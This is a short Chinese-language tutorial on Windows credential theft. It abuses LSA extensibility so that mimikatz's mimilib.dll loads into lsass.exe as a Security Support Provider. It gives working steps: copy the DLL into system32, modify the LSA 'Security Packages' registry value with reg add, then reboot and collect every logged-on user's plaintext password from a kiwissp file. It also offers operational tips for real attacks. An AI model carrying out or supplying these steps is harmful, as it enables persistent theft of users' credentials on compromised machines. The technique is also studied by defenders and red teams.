说明:
SSP全称为security Support Provider,直译为安全支持提供者,又名Security Package。SSP是一个用于身份验证的dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中。
原理:
由于lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,此时我们就可以通过lsa的可扩展性,让它加载一个恶意的dll。使得所有登录记录的明文账号密码都被记录下来。 利用mimikatz 中mimilib.dll 文件即可完成此操作。
直接通过mimikatz对lsass.exe进程进行注入,达到类似加载恶意dll的效果。
具体操作:
1、将mimilib.dll拷贝到system32目录
2、查询注册表并修改之
命令:
reg query hklm\system\currentcontrolset\control\lsa\ /v “Security Packages”
reg add hklm\system\currentcontrolset\control\lsa\ /v “Security Packages” /d “mimilib” /t REG_MULTI_SZ(需视查询情况修改,千万不要把原来的数据删了,可能会导致windows异常)
3、重启机器,等待登录后可在system32目录中的kiwissp查看密码(真实利用过程中,谨慎重启)